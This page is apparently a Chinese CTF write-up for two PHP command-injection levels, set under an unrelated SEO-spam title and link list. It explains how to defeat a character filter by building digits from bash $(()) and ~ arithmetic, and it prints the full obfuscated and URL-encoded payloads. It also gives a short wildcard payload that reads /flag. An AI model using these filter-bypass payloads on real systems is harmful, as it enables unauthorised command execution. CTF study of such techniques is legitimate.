当前位置: 首页 > wzjs >正文

python做网站性能怎么样郑州网站营销推广公司

wzjs 2025/8/17 14:24:35
python做网站性能怎么样,郑州网站营销推广公司,东莞58同城做网站电话,中央经济工作会议精神Level 13 源码分析 这题又回到了 PHP重点关注preg_match("/[A-Za-z0-9\"%*,-.\/:;>?[\]^|]/", $cmd)禁用了所有数字, 并且回到了 PHP, 没办法用上一关的方法进行绕过但是比起上一关, 给我们少绕过了 &, ~, _似乎有其他方法 解题分析 利用 $(()) 和 …

Level 13

源码分析

  • 这题又回到了 PHP
  • 重点关注
    preg_match("/[A-Za-z0-9\"%*+,-.\/:;>?@[\]^`|]/", $cmd)
  • 禁用了所有数字, 并且回到了 PHP, 没办法用上一关的方法进行绕过
  • 但是比起上一关, 给我们少绕过了 &, ~, _
  • 似乎有其他方法

解题分析

  • 利用 $(())~(取反操作) 进行构造数字
  • 这里就举一个例子, 如何构造数字 1, 我只能感叹太巧了(用电脑看吧, 手机看格式加载太奇怪了, 真不行去看原文链接)
    这里假设有符号整数只是1比特$(())     $(())       -> 0                              (二进制为 0000) (只写出一个)~$(())     ~$(())	           -> ~0   (二进制为 ~0000) (只写出一个)~$(())     ~$(())               -> ~0   (二进制为 ~0000) (只写出一个)$((~$(())))$((~$(())))         -> -1   (二进制为 1111) (只写出一个)$(($((~$(())))$((~$(())))))      -> -2   (二进制为 1110)~$(($((~$(())))$((~$(())))))            -> ~-2  (二进制为 ~1110)
$((~$(($((~$(())))$((~$(())))))))        -> 1    (二进制为 0001)
    • 剩下的就自己推吧
      oct_list = [  # 构造数字 0-7 以便于后续八进制形式的构造'$(())',  # 0'$((~$(($((~$(())))$((~$(())))))))',  # 1'$((~$(($((~$(())))$((~$(())))$((~$(())))))))',  # 2'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 3'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 4'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 5'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 6'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))',  # 7
]
  • ${!#} 来表示 bash 在本关的 PHP 环境并不适用, 只能通过定义变量的方式进行
    • 先定义一个 变量 __, 并赋值为 0, 即 __=0
      • 这里注意终端的命名规则
      • 变量命名规范是以下划线或者英文字母开头,可以包含下划线和英文字母数字
      • 所以不能使用一个 _ 作为变量名
  • 然后通过 ${!__} 的方式来代替 $0, 即终端名
  • 而定义变量与获取flag的命令之间采用 && 连接
  • 最后 payload 如下
    __=$(())&&${!__}<<<${!__}\<\<\<\$\'\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$(())\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\'

解题步骤

  • 这一题又是 GET 传递参数, 又需要进行URL编码, 因为这里新加入了 =, &符号, 为了方便, 直接全部拿去 URL编码 了, 最后 Payload 如下
?cmd=%5f%5f%3d%24%28%28%29%29%26%26%24%7b%21%5f%5f%7d%3c%3c%3c%24%7b%21%5f%5f%7d%5c%3c%5c%3c%5c%3c%5c%24%5c%27%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%5c%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%24%28%28%7e%24%28%28%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%24%28%28%7e%24%28%28%29%29%29%29%29%29%29%29%5c%27
  • 请添加图片描述

Level 14

源码分析

  • 这一关采用了 strlen() 函数检测命令长度
  • 并只允许执行小于 7个字符的命令

解题分析

  • 应该还记得前几关使用的通配符吧
  • cat /flag 压缩到 7个字符以下应该不难吧

解题步骤

  • Payload 如下
    ?1=cat%20/f*
http://www.dtcms.com/wzjs/380703.html

相关文章:

  • 感觉做的比较好的健身网站广州现在有什么病毒感染
  • 你注册过的那些网站河南网站推广多少钱
  • 什么是一学一做视频网站好网络营销未来有哪些发展趋势
  • 网站云服务器租用今日头条新闻头条
  • 找人代做网站费用b2b电子商务网站
  • 免费获取资源的公众号seo属于什么职位类型
  • 做软件销售网站济南seo优化外包服务
  • 网站建设市场调查报告百度客服电话24小时人工服务热线
  • vps amh wordpress搜索引擎网站优化推广
  • 网站简单代码企业品牌推广方案
  • 手机网站seo怎么做做优化的网站
  • 有没有咨询求助做任务的网站在线之家
  • 重庆网站建设公司魁网做一个微信小程序需要多少钱
  • 临邑县住房和城乡建设局网站seo平台是什么意思
  • 阿里云建设网站流程搭建网站平台
  • 小公司建网站 优帮云南宁seo渠道哪家好
  • asp.net 网站安全 检测站长素材网站
  • c 网站开发需要学什么软件有哪些如何建立免费个人网站
  • 南京网站设计案例俄罗斯引擎搜索
  • 做铝材哪些网站招聘网页宣传
  • 做网站广告经营者周口网站建设公司
  • 温州网站建设策划方案如何免费建立一个网站
  • 招商网站建设网络营销推广方法和手段
  • 有主体新增网站seo排名软件有用吗
  • 北京网站制作报价搜索平台
  • 武汉卫生人才网小红书seo排名优化
  • 套网站模板软件怎么申请网站
  • 红酒网站建设seo这个职位是干什么的
  • dz 一步一步教你做网站福州seo博客
  • seo权重优化软件宁波网站推广优化公司怎么样